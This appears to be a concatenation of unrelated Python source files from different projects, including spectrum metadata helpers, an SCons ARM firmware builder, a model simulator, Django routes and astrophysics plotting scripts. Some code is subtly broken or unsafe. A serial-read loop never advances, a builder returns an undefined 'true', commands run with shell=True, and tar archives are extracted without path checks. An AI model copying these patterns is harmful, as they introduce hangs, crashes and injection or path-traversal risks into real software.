raise NotImplementedError("Base LangSwitcher is Abstract.")
#Remove the last piece of the function name from the rest of the name for further processing
def clearFunctionRemnants(self,line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Returns [NOT_CONTINUATION, CONTINUATION_START, CONTINUATION_END]
#depending on whether or not this line wraps to the next, is in the middle of such a state
#or at the end of one. Prior Status tells us if the previous line was a continuation line.
#Prior status is just a True/False Value.
def isContinuationLine(self, line, priorStatus):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Remove all strings from a line
def removeStrings(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
|
python
|
import logging
from typing import Any
from typing import List
from typing import Optional
from matchms.utils import filter_none
from matchms.utils import get_common_keys
from ..typing import SpectrumType
logger = logging.getLogger("matchms")
_retention_time_keys = ["retention_time", "retentiontime", "rt", "scan_start_time", "RT_Query"]
_retention_index_keys = ["retention_index", "retentionindex", "ri"]
def safe_store_value(spectrum: SpectrumType, value: Any, target_key: str) -> SpectrumType:
"""Helper function to safely store a value in the target key without throwing an exception, but storing 'None' instead.
Parameters
----------
spectrum
Spectrum to which to add 'value' in 'target_key'.
value
Value to parse into 'target_key'.
target_key
Name of the key in which to store the value.
Returns
-------
Spectrum with added key.
"""
if value is not None: # one of accepted keys is present
value = safe_convert_to_float(value)
spectrum.set(target_key, value)
return spectrum
def safe_convert_to_float(value: Any) -> Optional[float]:
"""Safely convert value to float. Return 'None' on failure.
Parameters
----------
value
Object to convert to float.
Returns
-------
Converted float value or 'None' if conversion is not possible.
"""
if isinstance(value, list) and len(value) == 1:
value = value[0]
try:
value = float(value)
rt = value if value >= 0 else None # discard negative RT values
except ValueError:
logger.warning("%s can't be converted to float.", str(value))
rt = None
return rt
def _add_retention(spectrum: SpectrumType, target_key: str, accepted_keys: List[str]) -> SpectrumType:
"""Add value from one of accepted keys to target key.
Parameters
----------
spectrum
Spectrum from which to read the values.
target_key
Key under which to store the value.
accepted_keys
List of accepted keys from which a value will be read (in order).
Returns
-------
Spectrum with value from first accepted key stored under target_key.
"""
common_keys = get_common_keys(spectrum.metadata.keys(), accepted_keys)
values_for_keys = filter_none([spectrum.get(key) for key in common_keys])
values = list(map(safe_convert_to_float, values_for_keys))
value = next(filter_none(values), None)
spectrum = safe_store_value(spectrum, value, target_key)
return spectrum
def add_retention_time(spectrum_in: SpectrumType) -> SpectrumType:
"""Add retention time information to the 'retention_time' key as float.
Negative values and those not convertible to a float result in 'retention_time'
being 'None'.
Parameters
----------
spectrum
Spectrum with retention time information.
Returns
-------
Spectrum with harmonized retention time information.
"""
if spectrum_in is None:
return None
spectrum = spectrum_in.clone()
target_key = "retention_time"
spectrum = _add_retention(spectrum, target_key, _retention_time_keys)
return spectrum
def add_retention_index(spectrum_in: SpectrumType) -> SpectrumType:
"""Add retention index into 'retention_index' key if present.
Parameters
----------
spectrum
Spectrum with RI information.
Returns
-------
Spectrum with RI info stored under 'retention_index'.
"""
if spectrum_in is None:
return None
spectrum = spectrum_in.clone()
target_key = "retention_index"
spectrum = _add_retention(spectrum, target_key, _retention_index_keys)
return spectrum
|
python
|
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common functions."""
import subprocess
import sys
def error_and_exit(message):
"""Helper function to print errors and exit with sig 1."""
print('encryption_wrapper wrapper ERROR: {}'.format(message))
sys.exit(1)
def run_command(cmd, description):
"""Helper function to execute commands.
Args:
cmd: the command to execute
description: description of the command, for logging purposes
Returns:
results: output from the executed command
"""
try:
p = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
while True:
# print command output as it happens
line = p.stdout.readline()
if not line:
break
else:
print(str(line.strip(), 'utf-8'))
except subprocess.SubprocessError as command_exception:
error_and_exit('{} failed: {}'.format(description,
str(command_exception)))
# now communicate with the subprocess to the returncode property is set
p.communicate()
return p.returncode
|
python
|
#
# cortexm.py
#
#
# Copyright (c) 2013-2017 Western Digital Corporation or its affiliates.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. The name of the copyright holder nor the names of its contributors may not
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Author: Jeremy Garff <[email protected]>
#
# ARM Tools
import SCons
import os
import string
import struct
import array
import tarfile
def cortexm_flags(env):
gnu_tools = ['gcc', 'g++', 'gnulink', 'ar', 'gas']
for tool in gnu_tools:
env.Tool(tool) # This will ensure the normal Program, Object, etc.. work
cflags = '''
-D__EMBEDDED_STANDALONE__
-O0
-Wno-error=strict-aliasing
-mthumb
-Werror
-Wall
-g
-ffunction-sections
-fdata-sections
-fno-omit-frame-pointer
'''.split()
env['CFLAGS'] = cflags
env['CPPPATH' ] = [
'#/common',
]
env['CC'] = 'arm-none-eabi-gcc'
env['LINK'] = 'arm-none-eabi-gcc'
env['AR'] = 'arm-none-eabi-gcc-ar'
env['RANLIB'] = 'arm-none-eabi-gcc-ranlib'
env['OBJCOPY'] = 'arm-none-eabi-objcopy'
# Build a specially formed command line to include the libs
# given the quirks of gcc. ${LINKSCRIPT} must be defined for
# the appropriate environment (app, bootloader, etc.).
link = '''
--specs=nano.specs
-mthumb
-nostartfiles
-Wl,--relax
-Wl,--gc-sections
-T${LINKSCRIPT}
'''.split()
env.Append(
LINKFLAGS = link
)
# Verbose?
if not env['V']:
env.Append(
VERBOSE = "/dev/null",
CCCOMSTR = "CC ${TARGET}",
ARCOMSTR = "AR ${TARGET}",
RANLIBCOMSTR = "RANLIB ${TARGET}",
BINCOMSTR = "Bin ${TARGET}",
HEXCOMSTR = "Hex ${TARGET}",
ELFCOMSTR = "Elf ${TARGET}",
IMGCOMSTR = "Img ${TARGET}",
FWCOMSTR = "Firmware ${TARGET}",
UNTARCOMSTR = "UnTar ${SOURCE}",
BUILDCOMSTR = "Build ${TARGETS}",
APPLYCOMSTR = "Apply ${SOURCE}",
USERSIGCOMSTR= "Usersig ${SOURCE}",
SECTIONCOMSTR= "Sections ${TARGET}",
PDICOMSTR = "PDI ${TARGET}",
CGENCOMSTR = "CGEN ${TARGET}",
)
else:
env.Append(
VERBOSE = "/dev/stdout"
)
#
# Builder python functions
#
def cortexm_builders(env):
def tar_info_to_node(object):
return env.File(object.name)
#
# ROM Object C Code Builders
#
def create_csource_from_files(target, source, env):
def generate_cobject(pathname, data):
filename = pathname.split(os.sep)[-1];
cobj_name = filename.replace('.', '_')
objstr = "const uint8_t " + cobj_name + "[] =\n{\n "
j = 0
for i in data:
objstr = objstr + "0x%02x," % i
j = j + 1
if j > 15:
objstr = objstr + '\n '
j = 0
objstr = objstr + "\n};\n\n"
return filename, cobj_name, objstr, len(data)
def generate_cfile(target, source):
f = open(target[0].abspath, 'w')
f.write("/**** DO NOT EDIT **** Automatically Generated by cortexm.py */\n")
f.write("#include <stdint.h>\n")
f.write("#include <lwip/ip.h>\n")
f.write("#include <lwip/ip_addr.h>\n")
f.write("#include <lwip/netif.h>\n")
f.write("#include <lwip/tcpip.h>\n")
f.write('\n')
f.write('#include "http.h"\n')
# Create all of the individual objects
objs = []
for s in source:
source_data = [ord(x) for x in file(s.abspath).read()]
filename, cobjname, source_code, length = generate_cobject(s.abspath, source_data)
objs.append([ cobjname, filename, length ])
f.write(source_code)
# Create the master lookup table
f.write("const http_page_table_t http_pages[] =\n{\n");
for obj in objs:
f.write(" {\n")
f.write(' .name = "%s",\n' % obj[1])
f.write(" .object = %s,\n" % obj[0])
f.write(" .length = %s,\n" % obj[2])
f.write(" },\n");
f.write("};\n\n")
f.write("const uint32_t http_page_table_count = %d;\n\n" % len(objs))
f.close()
generate_cfile(target, source)
def tar_contents_emitter(target, source, env):
env.Depends(target, source)
try:
tar = tarfile.open(source[0].get_abspath(), 'r')
except IOError:
return target, source
contents = tar.getmembers()
tar.close()
files_only = filter(lambda entry: entry.isfile(), contents)
updated_targets = map(tar_info_to_node, files_only)
return updated_targets, source
def untar(target, source, env):
filename = source[0].get_abspath()
pathname = os.path.dirname(source[0].get_abspath())
tar = tarfile.open(filename, 'r')
tar.extractall(path = pathname)
tar.close()
return None
# CRC32, same algorithm used in ethernet, png, zip, etc..
def crc32(data):
crc_poly = 0xedb88320
crc = 0xffffffff
for d in data:
b = (crc & 0xff) ^ d
for r in range(8):
if (b & 1):
b = ( b >> 1) ^ crc_poly;
else:
b = (b >> 1)
crc = (crc >> 8) ^ b
return crc ^ 0xffffffff
def create_usersig(target, source, env):
data = [ord(x) for x in file(source[0].abspath, "rb").read()]
size = len(data)
crc = crc32(data)
usersig = [
# crc - little endian
crc & 0xff,
(crc >> 8) & 0xff,
(crc >> 16) & 0xff,
(crc >> 24) & 0xff,
# size - little endian
size & 0xff,
(size >> 8) & 0xff,
(size >> 16) & 0xff,
(size >> 24) & 0xff,
]
outdata = array.array('B', usersig)
outdata.tofile(file(target[0].abspath, "wb"))
# Create binary and usersig size header file
#
# source[0] : Application binary file
# source[1] : Usersig binary file
def create_section_header(target, source, env):
app_data = [ord(x) for x in file(source[0].abspath, 'rb').read()]
app_size = len(app_data)
usersig_data = [ord(x) for x in file(source[1].abspath, 'rb').read()]
usersig_size = len(usersig_data)
header = '/* ***** DO NOT MODIFY - Auto-generated by create_section_header **** */\n'
header = header + '#define APP_LEN ' + str(app_size) + '\n'
header = header + '#define USERSIG_LEN ' + str(usersig_size) + '\n'
file(target[0].abspath, 'wb').write(header)
def create_app_image(target, source, env):
def create_app_header(source, dest):
data = [ord(x) for x in file(source, "rb").read()]
size = len(data)
crc = crc32(data)
major, minor, micro = (0, 0, 0)
if 'VERSION' in env:
major, minor, micro = env['VERSION']
if env['V']:
print " Version : " + str(major) + "." + str(minor) + "." + str(micro)
print " Size : " + str(size)
print " CRC : " + hex(crc)
header = [ # See boot.h for struct definition
# magic
0x43, 0x89,
# flags
0, 0,
# crc - little endian
crc & 0xff, (crc >> 8) & 0xff,
(crc >> 16) & 0xff, (crc >> 24) & 0xff,
# size - little endian
size & 0xff, (size >> 8) & 0xff,
(size >> 16) & 0xff, (size >> 24) & 0xff,
# version
int(major), int(minor), int(micro), 0,
]
outdata = array.array("B", header + data)
outdata.tofile(file(dest, "wb"))
create_app_header(source[0].abspath, target[0].abspath)
# Combined image with bootloader and application
#
# Make sure to pad the bootloader size out to the full section (80k)
# See the .ld files to determine the proper size here
def create_full_binary(target, source, env, max_boot_size = 80 * 1024):
def pad_data(data, size):
padded = data + ([0] * (size - len(data)))
if len(padded) > size:
raise Exception("Boot section too large")
return padded
boot_data = pad_data([ord(x) for x in file(source[0].abspath, "rb").read()], max_boot_size)
app_data = [ord(x) for x in file(source[1].abspath, "rb").read()]
all_data = array.array('B', boot_data + app_data)
all_data.tofile(file(target[0].abspath, "wb"))
env.Append(BUILDERS = {
'Elf': SCons.Builder.Builder(
action = SCons.Action.Action("${LINK} -lc -lm ${LINKFLAGS} -Wl,--start-group ${SOURCES} -Wl,--end-group -o ${TARGET}", "${ELFCOMSTR}"),
suffix = '.elf'
),
'Hex' : SCons.Builder.Builder(
action = SCons.Action.Action("${OBJCOPY} -O ihex ${SOURCES} ${TARGET}", "${HEXCOMSTR}"),
suffix = '.hex'
),
'Bin' : SCons.Builder.Builder(
action = SCons.Action.Action("${OBJCOPY} -O binary ${SOURCES} ${TARGET}", "${BINCOMSTR}"),
suffix = '.bin'
),
'Usersig' : SCons.Builder.Builder(
action = SCons.Action.Action(create_usersig, "${USERSIGCOMSTR}"),
suffix = '.usersig'
),
'Firmware' : SCons.Builder.Builder(
action = SCons.Action.Action(create_app_image, "${FWCOMSTR}"),
suffix = ".fw"
),
'SectionHeader' : SCons.Builder.Builder(
action = SCons.Action.Action(create_section_header, "${SECTIONCOMSTR}"),
suffix = '.h'
),
'Image': SCons.Builder.Builder(
action = SCons.Action.Action(create_full_binary, "${IMGCOMSTR}"),
suffix = ".img"
),
'UnTar' : SCons.Builder.Builder(
action = SCons.Action.Action(untar, "${UNTARCOMSTR}"),
emitter = tar_contents_emitter # Update the ${TARGETS} to include all extracted files
),
'CGen' : SCons.Builder.Builder(
action = SCons.Action.Action(create_csource_from_files, "${CGENCOMSTR}"),
suffix = '.c',
),
})
#
# The following are required functions when using this via tools= in Environment()
#
def exists(env):
return true
def generate(env, **kwargs):
[ f(env) for f in (cortexm_flags, cortexm_builders) ]
|
python
|
# Advent of Code - Day 5 - Part One
from collections import defaultdict
def result(data):
points = defaultdict(int)
for line in data:
a, b = line.split(' -> ')
x1, y1 = a.split(',')
x2, y2 = b.split(',')
x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)
min_x, max_x = min(x1,x2), max(x1,x2)
min_y, max_y = min(y1, y2), max(y1,y2)
if min_x == max_x or min_y == max_y:
for x in range(min_x, max_x+1):
for y in range(min_y, max_y+1):
points[(x,y)] += 1
count = 0
for k in points.keys():
if points[k] > 1:
count += 1
return count
|
python
|
# -*- coding: utf-8 -*-
"""Split Definition dataclass"""
from dataclasses import dataclass
from typing import Optional, List
from .rule import Rule
from .treatment import Treatment
from .environment import Environment
from .default_rule import DefaultRule
from .traffic_type import TrafficType
@dataclass
class SplitDefinition:
"""Split Definition model"""
treatments: List[Treatment]
defaultTreatment: str
defaultRule: List[DefaultRule]
name: Optional[str] = None
environment: Optional[Environment] = None
trafficType: Optional[TrafficType] = None
killed: Optional[bool] = None
baselineTreatment: Optional[str] = None
trafficAllocation: Optional[int] = None
rules: Optional[List[Rule]] = None
creationTime: Optional[int] = None
lastUpdateTime: Optional[int] = None
comment: Optional[str] = None
|
python
|
#!/usr/bin/env python
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Simulates test model
"""
import sys
import copy
import os
import optparse
from tema.model import getModelType,loadModel
def load_testdata(testdata_args):
module=__import__("tema.data.testdata",globals(),locals(),[""])
testdata=module.TestData()
# assuming that testdata_args are of form key:value,key2:value2,...
# see set_parameters function in testengine to do this properly
for key,value in [kv.split(":") for kv in testdata_args.split(",")]:
testdata.setParameter(key,value)
testdata.prepareForRun()
return testdata
def simulate(starting_state,testdata):
state=starting_state
stack=[]
action=""
while action!="q":
outtrans=state.getOutTransitions()
print ""
for i,t in enumerate(outtrans):
print "%3i: %30s -> %s" % (i+1,t.getAction(),t.getDestState())
action=raw_input("(%s) -> " % state)
try:
chosen=int(action)-1
if testdata:
stack.append((state,copy.deepcopy(testdata._runtimedata.namespace)))
else:
stack.append(state)
state=outtrans[chosen].getDestState()
if testdata:
try: paction=testdata.processAction(str(outtrans[chosen].getAction()))
except Exception, e:
print "error in execution:",e
else: print "executed: '%s'" % paction
except:
if action=="b":
if stack:
if testdata:
state,testdata._runtimedata.namespace=stack.pop()
else:
state=stack.pop()
else: print "Already in the initial state"
elif action=="i": state=starting_state
def readArgs():
usagemessage = "usage: %prog [filename] [options]"
description = "If no filename is given or filename is -, reads from standard input"
parser = optparse.OptionParser(usage=usagemessage,description=description)
parser.add_option("-f", "--format", action="store", type="str",
help="Format of the model file")
parser.add_option("--testdata", action="store", type="str",
help="Testdata for model")
options, args = parser.parse_args(sys.argv[1:])
if len(args) == 0:
modelfile = "-"
elif len(args) == 1:
modelfile = args[0]
else:
parser.error("More than one filename given")
if not options.format and modelfile == "-":
parser.error("Reading from standard input requires format parameter")
return modelfile,options
def main():
modelfile,options=readArgs()
if options.testdata:
testdata=load_testdata(options.testdata)
else:
testdata=None
try:
modeltype=options.format
if not modeltype:
modeltype = getModelType(modelfile)
if not modeltype:
print >>sys.stderr, "%s: Error. Unknown model type. Specify model type using '-f'" % os.path.basename(sys.argv[0])
sys.exit(1)
if modelfile == "-":
file_object=sys.stdin
else:
file_object=open(modelfile)
m=loadModel(modeltype,file_object)
except Exception, e:
print >>sys.stderr,e
sys.exit(1)
simulate(m.getInitialState(),testdata)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
sys.exit(1)
|
python
|
import serial
import struct
s = serial.Serial('/dev/cu.usbserial-A600e0ti', baudrate=19200)
def receive_msg():
print 'Receiving messages'
message = []
c = s.read()
while c != '\n':
message.append(c)
message = ''.join(message)
print 'Msg:', message
|
python
|
from django.conf.urls import url
from app05plus.views import index, register, mylogin
from app05plus.views import mylogout
urlpatterns = [
url(r"^newindex01$",index),
url(r"^register01$",register,name="register"),
url(r"^mylogin01$",mylogin,name="mylogin"),
url(r"^logout$",mylogout),
]
|
python
|
import astropy.units as u
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.animation import FuncAnimation
from einsteinpy.metric import Schwarzschild
class ScatterGeodesicPlotter:
"""
Class for plotting static matplotlib plots.
"""
def __init__(
self, mass, time=0 * u.s, attractor_color="black", cmap_color="Oranges"
):
"""
Parameters
----------
attractor_color : string, optional
Color which is used to denote the attractor. Defaults to black.
cmap_color : string, optional
Color used in function plot.
"""
self.mass = mass
self.time = time
self._attractor_present = False
self.attractor_color = attractor_color
self.cmap_color = cmap_color
def _plot_attractor(self):
self._attractor_present = True
plt.scatter(0, 0, color=self.attractor_color)
def plot(self, coords, end_lambda=10, step_size=1e-3):
"""
Parameters
----------
coords : ~einsteinpy.coordinates.velocity.SphericalDifferential
Position and velocity components of particle in Spherical Coordinates.
end_lambda : float, optional
Lambda where iteartions will stop.
step_size : float, optional
Step size for the ODE.
"""
swc = Schwarzschild.from_spherical(coords, self.mass, self.time)
vals = swc.calculate_trajectory(
end_lambda=end_lambda, OdeMethodKwargs={"stepsize": step_size}
)[1]
time = vals[:, 0]
r = vals[:, 1]
# Currently not being used (might be useful in future)
# theta = vals[:, 2]
phi = vals[:, 3]
pos_x = r * np.cos(phi)
pos_y = r * np.sin(phi)
plt.scatter(pos_x, pos_y, s=1, c=time, cmap=self.cmap_color)
if not self._attractor_present:
self._plot_attractor()
def animate(self, coords, end_lambda=10, step_size=1e-3, interval=50):
"""
Function to generate animated plots of geodesics.
Parameters
----------
coords : ~einsteinpy.coordinates.velocity.SphericalDifferential
Position and velocity components of particle in Spherical Coordinates.
end_lambda : float, optional
Lambda where iteartions will stop.
step_size : float, optional
Step size for the ODE.
interval : int, optional
Control the time between frames. Add time in milliseconds.
"""
swc = Schwarzschild.from_spherical(coords, self.mass, self.time)
vals = swc.calculate_trajectory(
end_lambda=end_lambda, OdeMethodKwargs={"stepsize": step_size}
)[1]
time = vals[:, 0]
r = vals[:, 1]
# Currently not being used (might be useful in future)
# theta = vals[:, 2]
phi = vals[:, 3]
pos_x = r * np.cos(phi)
pos_y = r * np.sin(phi)
frames = pos_x.shape[0]
x_max, x_min = max(pos_x), min(pos_x)
y_max, y_min = max(pos_y), min(pos_y)
margin_x = (x_max - x_min) * 0.1
margin_y = (y_max - y_min) * 0.1
fig = plt.figure()
plt.xlim(x_min - margin_x, x_max + margin_x)
plt.ylim(y_min - margin_y, y_max + margin_y)
pic = plt.scatter([], [], s=1, c=[])
plt.scatter(0, 0, color="black")
def _update(frame):
pic.set_offsets(np.vstack((pos_x[: frame + 1], pos_y[: frame + 1])).T)
pic.set_array(time[: frame + 1])
return (pic,)
self.animated = FuncAnimation(fig, _update, frames=frames, interval=interval)
def show(self):
plt.show()
def save(self, name="scatter_geodesic.png"):
plt.savefig(name)
|
python
|
import os, sys
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import scipy.signal
from classy import Class
from helper import cache_grendel, cropsave, grendel_dir
"""
For just one of the boxes, plot the absolute CONCEPT
and GADGET spectra over time, including a = a_begin.
"""
textwidth = 504 # mnras: 240 (single-column), 504 (both columns)
width = textwidth/72.27
height = 4.185
# The general font size is 9 but in captions it is 8.
# We choose to match this exactly.
fontsize = 8 #9/1.2
latex_preamble = r'''
\usepackage{lmodern}
\usepackage{amsmath}
\usepackage{amsfonts}
\usepackage{mathtools}
\usepackage{siunitx}
\usepackage{xfrac}
\usepackage{nicefrac}
\usepackage{relsize}
\newcommand{\CONCEPT}{\textsc{co\textsl{n}cept}}
\newcommand{\CONCEPTONE}{\textsc{co\textsl{n}cept}\,\textscale{.77}{{1.0}}}
\newcommand{\GADGETTWO}{\textsc{gadget}-\textscale{.77}{{2}}}
'''
matplotlib.rcParams.update({
'text.usetex' : True,
'font.family' : 'serif',
'font.serif' : 'cmr10',
'font.size' : fontsize,
'mathtext.fontset' : 'cm',
'axes.formatter.use_mathtext': True,
'text.latex.preamble': latex_preamble,
})
h = 0.67
size = 1024
N = size**3
z_values = [10, 5, 3, 2, 1, 0.5, 0]
a_values = [1/(1 + z) for z in z_values]
boxsizes = [512]
boxsize = boxsizes[0]
nprocs = {2048: 256, 1024: 256, 512: 256, 256: 1024}
concept_standard = ['', 'final', 'symplectic_final'][2]
gadget_standard = ['', ][0]
textwidth = 240 # mnras: 240 (single-column), 504 (both columns)
width = textwidth/72.27
height = 2.09
fig = plt.figure(figsize=(width, height))
n_axis = 6
gs = fig.add_gridspec(n_axis, 1)
ax1 = fig.add_subplot(gs[:(n_axis - 1), 0])
ax2 = fig.add_subplot(gs[n_axis - 1, 0])
axes = [ax1, ax2]
# Load
cache_assume_uptodate = True
output_dir = f'{grendel_dir}/powerspec/concept_vs_gadget'
def load_concept(boxsize, special=''):
directory = f'{output_dir}/nprocs{nprocs[boxsize]}/{boxsize}/{special}'.rstrip('/')
P = []
k = None
for a in a_values:
filename = f'{directory}/powerspec_a={a:.2f}'
if cache_assume_uptodate:
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
else:
if not os.path.isfile(filename):
continue
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
k, _P = np.loadtxt(filename, usecols=(0, 2), unpack=True)
P.append(_P)
return k, P
def load_gadget_power(box, special=''):
directory = f'{output_dir}/Gadget2/box{box}_size{size}/{special}'.rstrip('/')
P = []
k = None
for i, a in enumerate(a_values):
filename = f'{directory}/powerspec_snapshot_00{i}'
if cache_assume_uptodate:
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
else:
if not os.path.isfile(filename):
continue
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
k, _P = np.loadtxt(filename, usecols=(0, 2), unpack=True)
P.append(_P)
return k, P
k_all = {}
P_concept = {}
P_gadget = {}
for boxsize in boxsizes:
k_all[boxsize], P_concept[boxsize] = load_concept(boxsize, concept_standard)
_, P_gadget[boxsize] = load_gadget_power(boxsize, gadget_standard)
def get_mask(k, k_nyq):
mask = (k < k_nyq)
for i, el in enumerate(reversed(mask)):
if el:
mask[i-3:] = False
break
return mask
def k_nyq_particles(boxsize):
"""Supply box in [Mpc/h] to get k_Nyquist in [1/Mpc]
"""
return 2*np.pi/boxsize*(np.cbrt(N)/2)*h
def smooth(x, y, n=500, num=40):
fac = np.log(1024)/np.log(2048)
num *= fac
num = int(round(num))
if num%2 == 0:
num += 1
x_interp = np.logspace(np.log10(x[0]), np.log10(x[-1]), n)
y_interp = np.interp(np.log10(x_interp), np.log10(x), y)
y_smoothed = scipy.signal.savgol_filter(y_interp, num, 2)
#steepness = 2
#k_smooth = 0.4*np.sqrt(x[0]*x[-1])
#weight = (1 - scipy.special.erf(steepness*np.log10(x_interp/k_smooth)))/2
#y_smoothed = weight*y_interp + (1 - weight)*y_smoothed
return x_interp, y_smoothed
# Also load initial power spectrum
filename = f'{grendel_dir}/powerspec/box512_size1024/powerspec_a=0.01'
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
k_ini, P_ini = np.loadtxt(filename, usecols=(0, 2), unpack=True)
k = k_all[boxsize]
if not np.all(k_ini == k):
print('Mismatch between initial and sim k!', file=sys.stderr)
a_begin = 0.01
z_values_all = [int(round(1/a_begin - 1))] + z_values
def get_class(boxsize):
k = k_all[boxsize]
cosmo = Class()
Omega_b = 0.049
Omega_cdm = 0.27
params = {
'Omega_b': Omega_b,
'Omega_cdm': Omega_cdm,
'H0': 67.0,
'P_k_max_1/Mpc': np.max(k)*1.01,
'output': 'dTk mPk',
'z_pk': ', '.join([str(float(z)) for z in z_values_all]),
}
cosmo.set(params)
cosmo.compute()
P_class = [np.array([cosmo.pk(ki, z) for ki in k]) for z in z_values_all]
# Scale according to D(a) with and without radiation
bg = cosmo.get_background()
a_bg = 1/(1 + bg['z'])
a_min = 1e-6
mask = (a_bg >= a_min)
a_bg = a_bg[mask]
D_class = bg['gr.fac. D'][mask]
Omega_m = Omega_b + Omega_cdm
Omega_Lambda = 1 - Omega_m
D_concept = a_bg*scipy.special.hyp2f1(1/3, 1, 11/6, -Omega_Lambda/Omega_m*a_bg**3)
D_concept /= D_concept[-1]
D_class_begin = scipy.interpolate.interp1d(np.log(a_bg), np.log(D_class), kind='cubic')(np.log(a_begin))
D_concept_begin = scipy.interpolate.interp1d(np.log(a_bg), np.log(D_concept), kind='cubic')(np.log(a_begin))
D_class = D_class * (D_concept_begin/D_class_begin) # same D at a_begin
facs = scipy.interpolate.interp1d(np.log(a_bg), D_concept/D_class, kind='cubic')(np.log([1/(1 + z) for z in z_values_all]))**2
P_class = [P_cl*fac for P_cl, fac in zip(P_class, facs)]
# Match at a_begin (difference in gauge)
fac = P_ini/P_class[0]
P_class = [P_cl*fac for P_cl in P_class]
return P_class
k_nyq = k_nyq_particles(boxsize)
mask = get_mask(k, k_nyq)
P_class = get_class(boxsize)
def plot(i, ax, P_c, P_g, P_cl, clip_on=True):
zorder = -100*(i+1)
z = z_values_all[i]
if z == 0.5:
z = r'\text{\textonehalf}'
color = f'C{i-1}'
if i == 0:
color = f'C{len(z_values_all)-1}'
x, y = k[mask]/h, ((k/h)**1.5*P_c *h**3)[mask]
x, y = smooth(x, np.log(y))
y = np.exp(y)
ax.loglog(x, y, f'{color}-',
label=f'$z = {z}$', clip_on=clip_on, zorder=zorder)
x, y = k[mask]/h, ((k/h)**1.5*P_g *h**3)[mask]
x, y = smooth(x, np.log(y))
y = np.exp(y)
ax.loglog(x, y, f'k--', clip_on=clip_on, zorder=zorder)
ax.loglog(k[mask]/h, ((k/h)**1.5*P_cl*h**3)[mask], f'k:', lw=1, clip_on=clip_on, zorder=zorder)
# a == a_begin
plot(0, ax2, P_ini, P_ini, P_class[0], clip_on=False)
# a > a_begin
for i, (P_c, P_g, P_cl) in enumerate(zip(P_concept[boxsize], P_gadget[boxsize], P_class[1:]), 1):
plot(i, ax1, P_c, P_g, P_cl, clip_on=(i != 1))
# Legend needs to be made from ax2
z = z_values_all[i]
if z == 0.5:
z = r'\text{\textonehalf}'
color = f'C{i-1}'
if i == 0:
color = f'C{len(z_values_all)-1}'
ax2.loglog(k[mask][0], P_c[mask][0], f'{color}-', label=f'$z = {z}$')
legend1 = ax2.legend(framealpha=0.6)
handles, labels = ax2.get_legend_handles_labels()
jumpy = 0.24
jumpx = 0.0088
legend1 = ax2.legend(handles[::-1], labels[::-1], loc=(0.037 + jumpx, 0.228 + jumpy))
legend1.set_zorder(np.inf)
legend1.set_clip_on(False)
for ax in axes:
ax.set_xlim(k[0]/h, k_nyq/h)
ax2.set_xlabel(r'$k\; [h/\mathrm{Mpc}]$')
ax1.set_ylabel(r'$k^{3/2}P\; [(\mathrm{Mpc}/h)^{3/2}]$ .......')
